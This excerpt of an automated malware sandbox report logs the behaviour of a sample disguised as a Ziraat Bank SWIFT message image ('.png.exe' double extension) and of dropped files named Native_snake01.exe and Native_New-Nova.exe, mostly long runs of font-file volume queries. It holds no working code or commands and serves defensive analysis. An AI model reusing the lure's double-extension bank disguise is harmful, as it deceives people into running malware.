Source: Native_snake01.exe, 00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRdq
Source: Native_snake01.exe, 00000011.00000002.2957921883.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRdq{
Source: Native_snake01.exe, 00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Native_snake01.exe, 00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRdqh
Source: Native_snake01.exe, 00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRdql
Source: Native_snake01.exe, 00000011.00000002.2957921883.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRdqp

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: GetLocaleInfoA,		9_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: GetLocaleInfoA,		10_2_00417A20

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
